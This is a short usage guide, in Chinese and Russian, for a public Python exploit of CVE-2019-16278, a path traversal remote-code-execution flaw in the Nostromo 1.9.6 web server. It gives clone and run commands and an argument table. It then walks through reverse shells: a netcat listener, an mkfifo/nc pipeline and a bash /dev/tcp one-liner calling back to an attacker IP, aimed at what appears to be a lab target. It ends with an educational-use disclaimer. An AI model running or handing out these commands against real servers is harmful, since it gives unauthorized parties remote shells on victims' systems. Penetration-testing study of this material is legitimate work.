
未经身份验证的攻击者可以强制服务器指向诸如'/bin/sh'之类的shell文件并执行任意命令,因为未能验证URL,导致路径遍历到系统中存在的任何文件。Nostromo的1.9.6等版本未能验证此URL
PoC
Репозиторий: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
Этот репозиторий содержит эксплойт на Python для CVE-2019-16278 — уязвимости в Nostromo 1.9.6 (веб-сервер). Уязвимость позволяет выполнять удалённый код (RCE) путём эксплуатации обхода каталогов для выполнения произвольных команд на целевой системе.
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
python3 CVE-2019-16278.py -t <ЦЕЛЕВОЙ_IP> -p <ПОРТ> -c "<КОМАНДА>" [-b <БАЙТ_ДЛЯ_ЧТЕНИЯ>]
Аргументы:
| Аргумент | Описание | Обязательный | По умолчанию |
|---|---|---|---|
-t, --target | IP-адрес цели | Да | Нет |
-p, --port | Порт цели | Да | Нет |
-c, --command | Команда для выполнения на сервере | Да | Нет |
-b, --bytes | Количество байт для чтения в ответе | Нет | 4096 |
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
Шаг 1: Запустите слушатель Netcat на вашей атакующей машине:
nc -lvnp 443
Шаг 2: Выполните эксплойт с полезной нагрузкой обратной оболочки:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
Этот инструмент предназначен только для образовательных целей. Не используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированный доступ к системам незаконен. Используйте ответственно.